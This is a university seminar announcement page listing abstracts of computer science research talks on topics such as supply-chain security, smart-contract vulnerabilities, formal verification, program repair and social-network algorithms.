Please let Vivi Andersson know if you want to give a seminar or receive email announcements about upcoming seminars.
Markus Borg (CodeScene / Lund University) | 14:00 in Room 1440, Henrik Eriksson
CodeScene is a modern software engineering intelligence platform that blends static code analysis with insights into organizational dynamics. Unlike traditional tools that focus solely on code quality, CodeScene also provides insights into the human aspects of software development. Core features of CodeScene include technical debt management and software visualization. CodeScene provides assistance through automated code reviews and quality gates in the CI pipeline, i.e., providing code smell detection in pull requests. Moreover, CodeScene provides an IDE integration for VS Code that helps developers mitigate code smells before committing code. Thanks to the advent of LLMs, CodeScene now offers code smell remediation in the IDE – a freemium solution that has been available for selected code smells since December 2024. In this talk, I will demo key CodeScene features and introduce the research we are doing related to technical debt management and AI-assisted development. Furthermore, I will share personal reflections on my role as a researcher with an industrial tool vendor – a position I’ve now had for 2.5 years.
Liane Colonna (Stockholm University/Swedish Law and Informatics Research Institute) | 15:00 in Room 1537 "Germund Dahlquist"
Rooted in idealism, the open-source model leverages collaborative intelligence to drive innovation, leading to major benefits for both industry and society. As open-source software (OSS) plays an increasingly central role in driving the digitalization of society, policymakers are examining the interactions between upstream open-source communities and downstream manufacturers. They aim to leverage the benefits of OSS, such as performance enhancements and adaptability across diverse domains, while ensuring software security and accountability. The regulatory landscape is on the brink of a major transformation with the recent adoption of both the Cyber Resilience Act (CRA) as well as the Product Liability Directive (PLD), raising concerns that these laws could threaten the future of OSS.
This paper investigates how the CRA and the PDL regulate OSS, specifically exploring the scope of exemptions found in the laws. It further explores how OSS practices might adapt to the evolving regulatory landscape, focusing on the importance of documentation practices to support compliance obligations, thereby ensuring OSS's continued relevance and viability. It concludes that due diligence requirements mandate a thorough assessment of OSS components to ensure their safety for integration into commercial products and services. Documentation practices like security attestations, Software Bill of Materials (SBOMs), data cards and model cards will play an increasingly important role in the software supply chain to ensure that downstream entities can meet their obligations under these new legal frameworks.
Link to paper: https://www.sciencedirect.com/science/article/pii/S0267364924001705
Eric Cornelissen (KTH) | 13:00 in Room 1440, Henrik Eriksson
Node.js and the JavaScript ecosystem have a reputation for complex supply chains and a large volume of publicly disclosed security advisories. Systematically attacking and defending JavaScript-based applications is a challenging task due to the dynamic nature of the language. In this seminar, we present our work on both fronts, attack and defense, for the supply chain of server-side JavaScript applications. For the former, we present a semi-automated dynamic analysis pipeline for uncovering prototype pollution (a class of vulnerabilities unique to JavaScript) gadgets in server-side JavaScript runtimes. For the latter, we present ongoing research into runtime hardening of JavaScript applications through SBOM and capability enforcement.
Marjan Sirjani (Malardalen University) | 11:00 in room 4523, Stefan Arnborg
A potential problem that may arise in the domain of distributed control systems is the existence of more than one primary controller in redundancy plans which may lead to inconsistency. We worked on an algorithm called NRP FD (Network Reference Point Failure Detection), proposed by industry, to solve this issue by prioritizing consistency over availability. I explain how by using modeling and formal verification, we discovered an issue in NRP FD where we may have two primary controllers at the same time. We then provide a solution to mitigate the identified issue, thereby enhancing the robustness and reliability of such systems. In the same context, I will also show how we used model checking for making informed decisions in designing test cases for fault-tolerant systems. I will add a discussion on how this approach may be generalized in different contexts.
Christof Ferreira Torres (Instituto Superior Técnico Lisboa) | 10:00 in Room 1440, Henrik Eriksson and https://kth-se.zoom.us/j/66862244070
Modern blockchains, like Ethereum, have surged in popularity over recent years, unlocking access to new financial instruments known as decentralized finance (DeFi). The security of DeFi largely depends on the security of smart contracts, which are programs deployed and executed across the blockchain. Like traditional software, smart contracts are prone to programming errors. However, unlike traditional code, their code is publicly visible and immutable. On platforms like Ethereum, smart contracts currently manage funds worth billions of dollars, making them a prime target for attackers. Over the past few years, numerous exploits have targeted smart contracts. In this talk, we will briefly explore the challenges and insights into detecting vulnerabilities in smart contracts through techniques like symbolic execution and fuzzing. We will also discuss the differences between traditional software security and economic security in the context of smart contracts. Finally, we will look at how automated program repair, using context-aware patch templates, can help protect vulnerable smart contracts.
Giacomo Benedetti (University of Genoa) | 11:00 in Room 4523, Sefan Arnborg
The integrity of software builds is fundamental to the security of the software supply chain. While Thompson first raised the potential for attacks on build infrastructure in 1984, limited attention has been given to build integrity in the past 40 years, enabling recent attacks on SolarWinds, xz, and Ultralytics. The best-known defense against build system attacks is creating reproducible builds; however, achieving them can be complex for both technical and social reasons and thus is often viewed as impractical to obtain.
In this study, we analyze the reproducibility of builds in a novel context: reusable components distributed as packages in six popular software ecosystems (npm, Maven, PyPI, Go, RubyGems, and Cargo). A quantitative study on a representative sample of packages in each ecosystem raises concerns: Rates of reproducible builds vary widely between ecosystems, with some ecosystems having all packages reproducible whereas others have reproducibility issues in nearly every package.
However, upon deeper investigation, we identified that with relatively straightforward infrastructure configuration and patching of build tools, we can achieve very high rates of reproducible builds in all studied ecosystems. We conclude that if the ecosystems adopt our suggestions, the build process of published packages can be independently confirmed for nearly all packages without individual developer actions, and doing so will prevent significant future software supply chain attacks.
Javier Ron (KTH) | 10:00 in Room 4523
In this seminar I will present two works related to N-Version Programming. The first focuses on leveraging existing diversity in blockchain protocols to increase node availability; and the second in automated generation of N-version functions. Specifically, I first introduce N-ETH, an N-version Ethereum blockchain node designed to improve availability under unstable execution environments. By leveraging diverse Ethereum node implementations, N-ETH mitigates faults by relying on asymmetric behavior. This is validated via system-call level fault injection experiments. Then, I present GALÁPAGOS, a tool that uses large language models (LLMs) to automate the generation of diverse function variants for the creation of N-Version programs. GALÁPAGOS generates functionally equivalent yet diverse software variants, to mitigate miscompilation bugs. Together, these works demonstrate how system-level diversity and AI-driven software generation can provide robust fault-tolerance solutions for modern computing environments.
Honglian Wang (KTH) | 15:00 in Room 1440 and https://kth-se.zoom.us/j/3467429329
In this seminar, I will present two projects.
The first project, titled "Sequential Diversification with Provable Guarantees," addresses the sequential diversity maximization problem, a widely studied topic with applications in information retrieval and recommendation systems. Unlike traditional diversity maximization, we focus on a sequential setting where a user interacts with a sequence of items presented in a predefined order. At each step, the user can choose to engage with an item or quit the interaction based on certain probabilities. The objective is to determine the optimal ordering of items to maximize the expected sequential diversity the user accumulates before quitting. To tackle this, we developed two approximation algorithms and established their provable guarantees.
The second project, "Fairness-Aware PageRank via Edge Reweighting," explores the emerging problem of improving group fairness in the PageRank vector. Existing research primarily modifies inputs to the PageRank algorithm, such as the transition matrix, restart vector, or restart probability, without altering the algorithm itself. In this paper, we achieve fairness by reweighting the edge weights of the input graph. We propose a fairness loss function, whichis non-convex, and we optimzied it with a gradient descent approach.
Yifei Jin (KTH) | 13:00 in Ada Room, Electrum and https://kth-se.zoom.us/j/62775642421
In this seminar, I will present three published papers and one under-review submission, all centered around the application of Graph Representation Learning (GRL)—encompassing Graph Neural Networks and Relational Representation Learning—to radio networks for enhanced user quality of service (QoS) estimation. With recent advancements toward 6G, network topologies have become denser and more complex, featuring intricate relational dependencies between network nodes and the surrounding RF environment. Traditional deep learning approaches, however, struggle to integrate domain-specific heuristics as representational priors within these models. Additionally, existing methods often lack the expressiveness needed to capture categorical structures, such as performance bottlenecks across multiple routing paths and inter-relations in cellular coverage. By embedding graph and relational modalities into GRL models, our work demonstrates substantial performance gains over state-of-the-art approaches, underscoring the value of domain-informed representation learning in complex network scenarios.
Zhe Ye (UC Berkeley) | 17:00 in Zoom
An optimistic rollup (ORU) scales a blockchain’s throughput by delegating computation to an untrusted remote chain (L2), refereeing any state claim disagreements between mutually distrusting L2 operators via an interactive dispute resolution protocol. State-of-the-art ORUs employ a monolithic dispute resolution protocol that tightly couples an L1 referee with a specific L2 client binary—oblivious to the system’s higher-level semantics. We argue that this approach (1) magnifies monoculture failure risk, by precluding trust-minimized and permissionless participation using operator-chosen client software; (2) leads to an unnecessarily large and difficult-to-audit TCB; and, (3) suffers from a frequently-triggered, yet opaque upgrade process—both further increasing auditing overhead, and broadening the governance attack surface.To address these concerns, we outline a methodology for designing a secure and resilient ORU with a minimal TCB, by facilitating opportunistic 1-of-N-version programming. Due to its unique challenges and opportunities, we ground this work concretely in the context of the Ethereum ecosystem—where ORUs have gained significant traction. Specifically, we design a semantically-aware proof system, natively targeting the EVM and its instruction set. We present an implementation in a new ORU, Specular, that opportunistically leverages Ethereum’s existing client diversity with minimal source modification, demonstrating our approach’s feasibility.
Frank Reyes García (KTH) | 11:00 in Room 4523
In modern software development, it is common to rely on third parties, which facilitates code reuse and speeds up project delivery. However, updating these dependencies has significant risks, as even minor version changes can lead to breaking changes that result in failed compilation of the application. In this talk, we present two innovative contributions to address the challenges posed by breaking dependency updates: BUMP, a benchmark for reproducible updates of breaking dependencies, and Breaking-Good, an automated analysis tool for fixing these failures.
BUMP contains 571 real-world-breaking dependency updates from 153 Java projects, ensuring reproducibility through Docker containers. This benchmark serves as a critical resource for researchers and developers, enabling consistent evaluations of tools to mitigate the impact of breaking changes.
Breaking-Good complements BUMP by providing an automated approach to understanding the root causes of build failures associated with dependency updates. By analyzing build logs and configuration files, Breaking-Good generates explanations and potential solutions for identified problems, significantly simplifying the debugging process for developers.
Together, these contributions increase the soundness of software development practices by improving the handling of dependency updates.
Larissa Schmid (Karlsruhe Institute of Technology (KIT)) | 11:00 in Room 1537
In this talk, I will present my past and current research. The main focus will be on my work on automated performance modeling and benchmarking methodologies for scientific software and serverless workflows. In this work, we introduce methodology to reduce the cost of performance modeling by identifying parameters relevant to performance and exploiting insights about their interaction using results of a code analysis. Moreover, we introduce SeBS-Flow, a benchmarking suite for serverless workflows, enabling comparative analysis across cloud platforms. In another line of research, we are investigating plagiarism detection in computer science education and how we can automatically detect plagiarized solutions in the face of increasingly sophisticated obfuscation techniques, including AI-based methods. Finally, I will touch upon my personal commitment regarding diversity in computer science, more specifically about investigating factors encouraging and discouraging women from pursuing a PhD in computer science.
Tianyi Zhou (KTH) | 10:00 in Room 1440 and https://kth-se.zoom.us/j/3467429329
Online media is an important part of modern information society and it is expected to foster diversity and break information barriers. However, the reality is quite the opposite: online media platforms often reinforce users' preexisting beliefs by showing them content that aligns with their views, creating "echo chambers" where diverse perspectives are ignored. As a result, it leads to greater social and political polarization.
In this talk, I will talk about two novel approaches that attempt to reduce online media polarization and foster information diversity. The first work is focused on modeling the impact of timeline algorithms on the political opinions of users. Timeline algorithms are key parts of online social platforms like X (Twitter), but in recent years they have been blamed for increasing polarization and disagreement in our society. Opinion-dynamics models have been used to study a variety of phenomena in online social networks, but an open question remains on how these models can be augmented to take into account the fine-grained impact of user-level timeline algorithms. We make progress on this question by providing a way to model the impact of timeline algorithms on opinion dynamics. We use our model to study the problem of minimizing polarization and disagreement and present a gradient descent-based algorithm for this problem with a theoretical guarantee. The second work was inspired by a recent debate about whether automated news aggregators, like Google News, which recommend articles from various online sources, lead readers to content that reinforces their existing beliefs and restricts their exposure to a diversity of perspectives. We design methods for selecting a set of articles that simultaneously cover all possible viewpoints, while also taking into account user preferences. In particular, we explore the trade-off between different viewpoint-coverage strategies and identify the most preferable strategy for our requirements. Through extensive experiments and case studies, we show that even though news aggregators may cover all news stories using articles from diverse media outlets, this can still lead to biased stances toward the entities mentioned in the articles. We show how this issue can be mitigated while still covering all stories and keeping the number of recommended articles small.
Aman Sharma (KTH) | 11:00 in Room 4523 and https://kth-se.zoom.us/j/64844199459
Due to the rise in Free and Open Source Software, software is built on top of other software and so on. This forms a nested dependency graph of software which is a part of Software Supply Chain. Malicious actors can attack this software supply chain in multiple ways and one of them is by exploiting a vulnerability in one of the dependencies of a particular software. These attacks are referred to as software supply chain attacks. Such an attack could take place while the application is running by triggering malicious code execution, leading to the application's compromise.
In this talk, we discuss a novel approach [1] to mitigate such attacks by proposing a tool that attaches to the application at runtime and prevents the execution of malicious code. Then we demonstrate how such an approach can mitigate one of the most infamous attacks, Log4Shell [2], that triggers the download and execution of unknown code during runtime. Next, we acknowledge other related work in the field and finally, we discuss the new ideas that have emerged from this research.
[1] https://arxiv.org/abs/2407.00246 [2] https://en.wikipedia.org/wiki/Log4Shell
Jesper Amilon (KTH) | 13:15 in Room 4523 and https://kth-se.zoom.us/j/63471645347
Within embedded systems software, correctness relies mainly on testing techniques. While testing may serve well as a bug-catcher, it cannot be used to formally prove their absence. For this, an exhaustive method, i.e., formal verification, is required. However, the cost and level of skill needed for formal verification means that it is often overlooked by the industry. Furthermore, several common software aspects, a prominent one being floating point arithmetic, are not well-supported by state-of-the-art tools. In this seminar, we present our work on formal verification of embedded-systems software at the Swedish heavy-vehicle manufacturer Scania, where we focus on automating the verification process to allow for easier integration of formal verification into the development chain. To this end, we present work on automatic verification of properties of arrays in C programs and automated verification of properties of C arrays. We will also discuss an approach for combining deductive verification and model checking. Lastly, we describe ongoing research for verification of C programs with floating point arithmetic.
Karolina Gorna | 11:00 in Room 1537
Public blockchain networks have faced security challenges at both the protocol and application levels for over a decade. To address scalability issues and high transaction fees on primary networks (Layer 1), secondary layers (Layer 2) like Rollups have been developed. They claim to offer offloading of transaction execution while aiming to maintain Layer 1's security standards. This research aims to confirm or refute this hypothesis by using a concolic execution methodology on Layer 2 software client binaries to study their effectiveness in preserving security equivalence with Layer 1.
Mojtaba Eshghie (KTH) | 10:30 in Room 1537 and https://kth-se.zoom.us/j/7998785238
Smart contracts are self-executing programs used to implement business transactions as code. Because smart contracts handle significant monetary assets, they are prime targets for exploitation—successful attacks on smart contract applications in 2024 amount to more than 100 million USD per month. Among the various types of vulnerabilities involved in these attacks, business logic vulnerabilities pose a particularly serious threat.
Despite their severity, previous research has largely overlooked business logic vulnerabilities. These flaws are not easily recognizable as they deviate from the expected program behavior and do not follow traditional patterns, complicating their detection using analysis tools, especially static analysis. Identifying business logic flaws requires understanding the contract’s intended behavior, often through a formal specification. We proposed DCR graphs, a well-known declarative modeling notation from business process modeling research, to capture the business logic of smart contracts.
To defend against business logic vulnerabilities, we have developed a monitoring tool that uses formal DCR specifications of the contract and monitors the interactions (transactions) with the contract.
The ground truth used to train and test smart contract analysis tools, such as our monitoring tool, is often based on the verdict of other tools rather than an actual verification result, as it does not scale. Furthermore, data sets lack concrete exploit examples. To address these shortcomings for our tool evaluation and to provide a methodology for other analysis tool developers, we generate and use concrete vulnerability-exploit pairs as a verdict. We demonstrate our oracle-guided methodology for diversifying and synthesizing business logic exploits and their efficiency with formal DCR specification of the contract built into the prompts.
Anoud Alshnakat (KTH) | 13:15 in Room 1537 and https://kth-se.zoom.us/my/anoud
The rise of Software-Defined Networking has introduced domain-specific languages such as P4, allowing engineers to program the data plane devices (switches). While this flexibility ensures faster network development, it also naturally introduces the risk of errors in P4 programs due to programmability. Additionally, P4 introduces security challenges, such as information leakage through complex data dependencies in network packet processing which might expose sensitive data.
In this seminar, I will present HOL4P4, which is a formalization of P4 semantics using the HOL4 interactive theorem prover. This semantics provides a formal foundation for the verification of P4 software. Furthermore, I will introduce a novel type system designed to ensure program progress and preservation of properties. Additionally, I will illustrate the semantics and type system using examples.
Furthermore, I will introduce P4Sec, a novel approach to securing P4 programs. P4Sec is based on a combination of security type systems and interval analysis to track information flow and enforce data-dependent security policies.
Toshiaki Aoki (Japan Advanced Institute of Science and Technology) | 10:00 in Teknikringen 33, Room 3412 and https://kth-se.zoom.us/j/9776973454
We are working on practical applications of formal methods to automotive systems. We successfully applied the formal methods to automotive operating systems including OSEK/VDX, Classic AUTOSAR, and Adaptive AUTOSAR OSs so far. We would like to extend our target to more modern automotive system platforms, in particular, those for automated driving systems. The modern automotive system consists of AI for perception and planning, control, and basic software for high-performance computing. Recently, we got a JST/CREST project titled 'Formal Methods and Verification Tools for Next-generation Automotive System Platforms' which focuses on such modern automotive systems. This project aims at proposing formal methods and verification tools to ensure the safety and reliability of next-generation automotive system platforms. These formal methods and verification tools cover the perception to control functions, and we stick in their practical application to real systems. In this talk, I would like to introduce the overview of the JST/CREST project after showing our research results obtained so far.
Sijing Tu (KTH) | 10:30 in Room 1537 and https://kth-se.zoom.us/j/3467429329
In contemporary society, online social networks play an essential role in people's lives, serving as platforms to maintain connections, access information, and express views on political and societal issues. In this background, online social networks present numerous data science challenges. These challenges include traditional graph mining tasks, such as detecting communities in the network, and new tasks like increasing the diversity of information exposure.
In this seminar, I will discuss some data science challenges in our research, focusing on our theoretical approaches to formulating and solving these problems. The problems discussed are NP-hard with some objective functions being \#P-hard to evaluate. The presentation involves five research papers that constitute my dissertation. In all of these papers, we compare our approaches against multiple baseline algorithms and heuristics and demonstrate the effectiveness of our methods. Below are high-level descriptions of these papers:
(1) Assuming the presence of two opposing political campaigns using social marketing, we aim to select disjoint seed sets for both sides to maximize the number of individuals receiving both sides' information. We model this as a combinatorial optimization problem under a $p$-system constraint and derive the approximation ratio for our approach. For efficient computation, we generalize the reverse-reachable sampling technique.
(2) Assuming that individuals' opinions vary within the interval [-1,1], our objective is to nudge some opinions within a predefined budget to maximize the network diversity. We apply the semidefinite relaxation approach to solve our problem and show the effectiveness of our approaches through experimental evaluation.
(3) To understand how viral marketing shapes individuals' opinions, we introduce the spread-acknowledge model: individuals' private opinions update when exposed to viral information, and their public opinions keep adjusting due to social pressure. We propose an efficient algorithm to estimate the equilibrium opinions and polarization of the network.
(4) To assess the impact of an adversary, we study how much polarization a weak adversary, which only knows the network structure and can nudge k individuals' opinions, can introduce to the network. The problem is a cardinality-constrained max-cut problem on a graph with positive and negative edge weights. We apply the semidefinite relaxation approach to obtain a constant-factor approximation ratio under certain assumptions.
(5) We study variations of the densest k-subgraph and cardinality-constrained max-cut problem. Assuming there is an initial subgraph/cut on a graph with n nodes, our goal is to change k nodes' positions corresponding to the subgraph/partition, to maximize the density/cut. We apply semidefinite relaxation approaches and obtain constant-factor approximation ratios assuming k = Omega(n). For the max-cut variant, we generalize the sum-of-squares relaxation applied in max-bisection and show that the optimality of the approximation ratio still holds in some regimes of k.
The whole seminar will last 90 minutes, with a 45-minute presentation. At the end of the presentation, the quality of the research work will be evaluated. Moreover, we will discuss how the current research can be improved and how to position it in my thesis.
Fabian Farestam | 15:00 in Room 1537 and Zoom
In this talk, we explore the challenges of attaining common knowledge in asymmetric multi-agent games with imperfect information. As a running example, we use a conceptual game involving an active sensor-less agent and a passive observer agent. Through this example, we demonstrate that common knowledge is inherently unattainable in such games. Our proof, laid out through a number of theoretical constructions, highlights the complexities and strategic depth of decision-making under uncertainty. With our findings we hope to enhance our understanding of strategic planning under imperfect information.
Daniel-Jesus Munoz (Universidad de Málaga) | 14:15 in Room 1537 and https://kth-se.zoom.us/j/66909147040
Product lines are highly configurable systems with numerous common and reusable components representing a family of products. Modelling real-world Software Product Lines (SPLs) in (pseudo) standards supported by automated reasoners is subject to many limitations when dealing with numerical components (i.e., numerical features) and quantitative properties (i.e., quality attributes). Additionally, interesting quantitative properties can be too complex to approximate in the feature space (e.g., energy requirements), and solution spaces can be too large to analyse. In this seminar, I will present the complexities of real-world SPL analysis, the difficulties of complex quantitative properties, the limitations of colossal solution spaces, and propose a range of possible solutions - some of them as exotic as Category Theory.
Ruo-Chun Tzeng (KTH) | 13:00 in Room 4523 (Stefan Arnborg) and https://kth-se.zoom.us/j/67689867244
This talk is divided into two parts, each consisting of two papers. The first part focuses on graph mining problems that can be described as Rayleigh quotient optimization. The second part focuses on improving the computational efficiency of combinatorial semi-bandits. For both parts, we develop algorithms with provable guarantees and compare them with the baselines or the fundamental limits. Below is the summary of the four papers:(i) Conflicting group detection aims to find k disjoint node subsets such that intra-group edges are mostly positive and inter-group edges are mostly negative. We extend the approach of a prior work on 2-conflicting group detection to k>=2. Our approach is empirically very competitive compared to the baselines. The main technique is randomized rounding and an eigenvector-based algorithm.(ii) For an eigensolver using O(dn) space and q passes, Randomized SVD is the most preferable method. We focus on the multiplicative ratio R(u), which is defined as the ratio of Rayleigh quotient of u and the largest eigenvalue. However, it has no theoretical guarantee for R in the o(ln n)-pass regime. This raises the natural question: is \Omega(ln n) passes necessary for Randomized SVD to provide a non-trivial guarantee? We answer this question by sharpening the theoretical guarantee of Randomized SVD for R in the o(ln n)-pass regime for PSD matrices, but also extend our results to provide non-trivial guarantees for some indefinite matrices. The main technique is the random projection lemma.(iii) Best-arm identification with fixed confidence for combinatorial semi-bandit feedback is a game between a learner and a stochastic environment. At each round, the learner selects an action to pull and observes a noisy reward for each arm in the selected action. The goal is to identify the best action with a probability of at least 1-\delta while using as few samples as possible. For this problem, several statistically optimal approaches exist, but none of them are computationally efficient. We close the computational-statistical gap by proposing the first optimal algorithm that runs in polynomial time. The main techniques are a two-player zero-sum game, stochastic smoothing, and the Frank-Wolfe algorithm.(iv) Matroid semi-bandit in regret minimization is given an action set which is the bases of a given matroid, and the goal is to identify the best base (action) while minimizing the cumulative regret. There exist competitive algorithms CUCB and instance-specifically optimal algorithms KL-OSM, but both require time complexity at least linear to the number K of arms. We develop an algorithm whose per-round time complexity is sublinear in K based on CUCB. The main techniques are minimum-hitting set and rounding.
Liyi Zhou (Imperial College London) | 10:00 in Zoom (https://kth-se.zoom.us/j/67833778211)
Did you know that attacks on blockchain, particularly in the realm of Decentralized Finance (DeFi), have resulted in a staggering loss of over USD 5 billion? In this presentation, I will unveil my vision for transforming the blockchain landscape, emphasizing a suite of intrusion prevention & detection tools that I believe could significantly enhance the safety and robustness of DeFi systems. I will also discuss BlockLLM, a real-time intrusion detection system trained on 68 million transactions. Among 124 attacks, BlockLLM successfully ranked 49 as the top three most aberrant transactions in their interactions with the victim application, potentially preventing USD 276 million in losses.
Camilla Björn (KTH) | 10:15 in Room 1537 and https://kth-se.zoom.us/j/68401572145
Progression is a term which, in later years, has become more frequently used in higher education. Despite this, it is not always clear what it refers to and how the progression will take place. In a study from last year, we found three main disambiguations to the term used in the literature. Progression is sometimes viewed in terms of completion or retention focusing on increasing the number of students graduating from (progressing through) the programme. It can also be used in the context of the necessary progression (steps) to learn a topic, often referred to as learning progressions. Finally, it can be used when referring to the planned progression built into the curriculum design. This is the meaning of the term I am focusing on in my work and I call this built-in progression to distinguish it from other interpretations.
Built-in progression is an important concept to create coherence in educational programmes and I would argue it is fundamental to develop a programme designed to help the students reach the programme objectives. Since the Bolonga Process, the pressure of designing programmes with progression in mind has increased. However, it is a non-trivial task and considering its importance, it has received surprisingly little attention. In curriculum design, it is also important to acknowledge the gap between the planned curriculum and the one the students experience in real life since this can help us create a curriculum that translates better into reality. In my work, I aim to increase the understanding of built-in progression and create a conceptual framework for helping design programmes with realistic and thoughtful progressions. In addition, I hope to be able to present my research in a way that helps the recipient feel empathy and understand some of the students’ perspectives. Understanding how the curriculum can impact the students, as well as having empathy for them, is important both when designing and teaching the curriculum.
In this seminar, I will start with a presentation on my research and thesis plan followed by a discussion with Professor Arnold Pears from the Department of Learning in Engineering Sciences.
Henrik Karlsson (KTH) | 15:00 in Room 4523 and https://kth-se.zoom.us/j/65862564111
Traditionally, safety-critical embedded systems have been implemented as distributed computing systems, ensuring that faults in one component can not easily propagate to other components. However, due to the ever-increasing need for computational power and the need to reduce a system's physical size, weight, and power consumption (SWaP), there has been a push toward integrating these distributed components into a single unit. For this reason, the concept of separation kernel is popular within safety-critical systems. A separation kernel is an OS kernel that robustly partitions a computer system's resources, allowing one to safely and securely integrate multiple system components onto a single chip, and thus reduce a system's overall SWaP. However, due to an increasing connectivity of critical systems, and subsequent cyber threats, there is also a need for improving the security of the separation kernel.
In this seminar, we explain how timing side-channels threaten the security of separation kernels, and how we can mitigate these threats using time protection. We discuss what is required of the kernel's design and implementation for effective time protection. We then present a minimal separation kernel for resource-contained embedded devices that uses the temporal fence instruction (designed for application-grade systems) to implement time protection. We demonstrate that this kernel can effectively mitigate timing side-channels, improve the time predictability of a system, and have an acceptable impact on performance. Finally, we present the design of a more advanced multicore separation kernel with dynamically configurable partitioning and time protection.
Ehsan Poorhadi (KTH) | 08:30 in Room 4423
Over recent years, the number and scale of cyberattacks on safety-critical systems have rapidly grown. Thus, it raised a serious concern over the safety of critical infrastructures such as railway signaling systems. Formal modeling and verification are often used to verify the safety of railway signaling systems. Currently, industry practitioners are willing to utilize their expertise and extend it to reason about safety in the presence of cyber threats. This motivated our research on integrating safety and security modeling to analyze how cyberattacks could jeopardize system safety. In this talk, we introduce an integrated approach to combining modeling in SysML and Event-B to support a rigorous integrated analysis of the impact of cyberattacks on system safety. Our approach allows the designers to model the system in SysML and then automatically translate it into Event-B, which formally supports the process of identifying safety requirements that are violated by cyberattacks. The safety requirements are formalized as model invariants, and the violated requirements are identified via the failed invariant preservation proof obligations. Such an analysis serves as a basis for the consecutive security analysis aiming to define security control mechanisms and prioritize their implementation. Finally, We have applied this approach to several case studies, including the Hybrid Level 3 signaling system—the most mature implementation of the ERTMS standard for automatic train protection.
André Silva (KTH) | 11:00 in Room 4523 and https://kth-se.zoom.us/j/7606930890
Automated Program Repair (APR) has evolved significantly with the advent of Large Language Models (LLMs). Fine-tuning LLMs for program repair is a recent avenue of research, with many dimensions which have not been explored. Existing work mostly fine-tunes LLMs with naive code representations and is fundamentally limited in its ability to fine-tune larger LLMs. To address this problem, we propose RepairLLaMA, a novel program repair approach that combines 1) code representations for APR and 2) the state-of-the-art parameter-efficient LLM fine-tuning technique called LoRA. This results in RepairLLaMA producing a highly effective `program repair adapter' for fixing bugs with language models. Our experiments demonstrate the validity of both concepts. First, fine-tuning adapters with program repair specific code representations enables the model to use meaningful repair signals. Second, parameter-efficient fine-tuning helps fine-tuning to converge and contributes to the effectiveness of the repair adapter to fix data-points outside the fine-tuning data distribution. Overall, RepairLLaMA correctly fixes 125 Defects4J v2 and 82 HumanEval-Java bugs, outperforming all baselines.
Deepika Tiwari (KTH) | 10:00 in Fantum and https://kth-se.zoom.us/j/5279673473
For software systems to be reliable, they need to be tested. The responsibility of testing lies with the developers who create and maintain the system, based on their understanding of it. However, the system may deviate from these assumed behaviors when it executes in production scenarios, as a result of the interactions made by end users. We hypothesize that insights from the production behavior of an application can be used to augment its test suite, and complement developer-written tests. In my 80% seminar, I will present how observations made from executing systems can be leveraged to automatically generate tests. We will first look at Pankti, an approach that captures production states and uses them to generate regression tests that contain explicit oracles to verify production behaviors. The second contribution we will discuss is RICK, an approach for automatically generating tests that replace external objects with mocks, stub the behavior of these mocks, and verify distinct aspects of production behaviors through mock-based oracles.
Amir Ahmadian (KTH) | 11:00 in Room 1440 and https://kth-se.zoom.us/j/5089122904
Software security is imperative in today's world as our reliance on technology continues to grow. In this seminar we are going to look at software security through the lens of language-based security and information flow control. We focus on defining and enforcing realistic security policies, in the presence of various real-world attacker models and investigate their effect on the security of software systems. For the main part of this presentation, I will focus on my research on disjunctive security policies. In this section, I provide an overview of the lattice structure proposed to define disjunctive security policies, discuss our extensions to it to make it suitable for database-backed programs, and propose a provably-sound static enforcement mechanism to verify a database-backed program is inline with a disjunctive policy. Next, I will provide an overview of my ongoing research on the security of P4 programs. This will include a brief introduction to the P4 programming language and its applications, a discussion on the challenges of enforcing information flow control policies on P4 programs, as well as an overview of our proposed enforcement mechanism which relies on security type systems and abstract interpretation.
Mikhail Shcherbakov (KTH) | 13:00 in Room 1440
Researchers and developers have been aware of code reuse attacks for decades, utilizing techniques such as Return-Oriented Programming (ROP) and Jump-Oriented Programming (JOP). These methods exploit "gadgets" -- small sequences of code already present within an application -- to achieve Arbitrary Code Execution (ACE) by leveraging memory corruption vulnerabilities in languages like C and C++. Memory-managed platforms, including the JVM, .NET, and JavaScript, offer protections against such memory corruption bugs, raising questions about what primitives within these managed runtimes could lead to ACE.
In this seminar, we explore the code-reuse primitives in the JavaScript language that attackers can exploit to achieve Remote Code Execution (RCE). Our primary concern is prototype pollution, a class of vulnerabilities that enables the exploitation of code reuse attacks. We adopt a comprehensive approach to this issue, starting from the identification of prototype pollution vulnerabilities to the detection of gadgets, with the ambitious goal of discovering end-to-end exploits. We discuss various aspects of these attacks, including code patterns of prototype pollution, methodologies for their static detection, associated gadgets in Node.js and Deno server-side JavaScript runtimes, and both static and dynamic approaches, including developed tools, for gadget detection. Furthermore, we explore end-to-end exploits that demonstrate how prototype pollution can lead to RCE in widely-used open-source applications. This seminar aims to provide an understanding of prototype pollution vulnerabilities, their exploitation mechanisms, and best practices for mitigating such threats.
Khashayar Etemadi (KTH) | 10:00 in Room 4523
Automated program repair (APR) is all about searching for a patch that fixes a given bug. This is performed in two steps: first, exploring the repair search space to obtain a large and diverse set of repair patches. Second, analyzing the discovered patches to identify the ones that are likely to actually fix the bug. In this presentation, we discuss both of these steps: efficient exploration of repair search spaces and effective analysis of repair patches. We show how template based and large language model based APR tools can be used to find a large and diverse set of plausible patches. We also present how the differences and similarities between patches can be identified.
Ioana Bercea (KTH) | 10:30 in Room 1537 and Zoom
We will talk about ways in which locality is employed in the design of data structures. We will focus on dictionaries, which maintain sets under insertions and deletions and support membership queries of the form “is an element x in the set?”. We will discuss how state-of-the-art techniques for dictionaries exploit locality in the word RAM model to obtain space and time gains and also how locality is exploited in the choice of hash functions employed for the design.
Boel Nelson (Aarhus) | 11:00 in Room 1440 and https://kth-se.zoom.us/j/62761627532
Confidentiality of metadata is a challenging privacy problem. Most systems today ensure confidentiality of data using encryption, but they do not address confidentiality of metadata. For example, encrypted data still leaks metadata such as when a message is sent, how long it is, and to whom it is addressed. While metadata privacy is a known problem, existing solutions are far from perfect: they are either resource exhaustive which affects performance, or they guarantee only weak notions of privacy.
In this talk I present the problem of transport layer privacy, and outline a novel formalization of the problem using information flow control techniques that introduces a new trade-off between performance and privacy for anonymous communication. To exemplify I present a provably private protocol for instant messaging which we call Deniable Instant Messaging, DenIM for short.
Joint work in progress with E. Pagnin and A. Askarov.
Aravind Ashok Nair (KTH) | 14:00 in Room 1440 and https://kth-se.zoom.us/my/aanair.kth
